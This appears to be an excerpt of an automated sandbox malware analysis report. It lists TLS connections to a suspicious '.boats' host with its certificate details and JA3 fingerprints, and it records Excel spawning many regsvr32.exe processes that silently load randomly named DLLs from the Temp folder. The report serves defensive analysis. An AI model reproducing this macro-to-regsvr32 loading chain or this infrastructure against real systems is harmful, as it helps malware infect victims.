                                                                                Jan 20, 2021 16:15:12.580827951 CET194.225.58.214443192.168.2.2249244CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:13.287823915 CET194.225.58.214443192.168.2.2249246CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:14.437695980 CET194.225.58.214443192.168.2.2249249CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:16.121128082 CET194.225.58.214443192.168.2.2249256CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:16.988439083 CET194.225.58.214443192.168.2.2249257CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:17.216505051 CET194.225.58.214443192.168.2.2249260CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:18.619196892 CET194.225.58.214443192.168.2.2249264CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:20.243889093 CET194.225.58.214443192.168.2.2249270CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:20.521085978 CET194.225.58.214443192.168.2.2249271CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:22.161134005 CET194.225.58.214443192.168.2.2249279CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:23.363163948 CET194.225.58.214443192.168.2.2249283CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:24.661545992 CET194.225.58.214443192.168.2.2249288CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:26.340131998 CET194.225.58.214443192.168.2.2249293CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:26.577426910 CET194.225.58.214443192.168.2.2249294CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:26.991142988 CET194.225.58.214443192.168.2.2249286CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:28.241166115 CET194.225.58.214443192.168.2.2249302CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:29.940860033 CET194.225.58.214443192.168.2.2249305CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:30.660327911 CET194.225.58.214443192.168.2.2249309CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: EXCEL.EXE PID: 552 Parent PID: 584

                                                                                General

                                                                                Start time:16:12:42
                                                                                Start date:20/01/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                Imagebase:0x13f190000
                                                                                File size:27641504 bytes
                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2496 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:50
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Imagebase:0xffbd0000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2316 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2348 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 1204 Parent PID: 2316

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Analysis Process: regsvr32.exe PID: 972 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 1664 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2684 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2940 Parent PID: 552

                                                                                General

                                                                                Start time:16:12:58
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2852 Parent PID: 552

                                                                                General

                                                                                Start time:16:13:02
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: regsvr32.exe PID: 2848 Parent PID: 2852

                                                                                General

                                                                                Start time:16:13:02
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2428 Parent PID: 552

                                                                                General

                                                                                Start time:16:13:03
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2424 Parent PID: 2428

                                                                                General

                                                                                Start time:16:13:04
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2400 Parent PID: 552

                                                                                General

                                                                                Start time:16:13:06
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2372 Parent PID: 2400

                                                                                General

                                                                                Start time:16:13:10
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2536 Parent PID: 552

                                                                                General

                                                                                Start time:16:14:02
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2408 Parent PID: 552

                                                                                General

                                                                                Start time:16:14:02
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2608 Parent PID: 552

                                                                                General

                                                                                Start time:16:14:05
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 1428 Parent PID: 2608

                                                                                General

                                                                                Start time:16:14:06
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 2456 Parent PID: 552

                                                                                General

                                                                                Start time:16:14:06
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: regsvr32.exe PID: 856 Parent PID: 2456

                                                                                General

                                                                                Start time:16:14:13
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >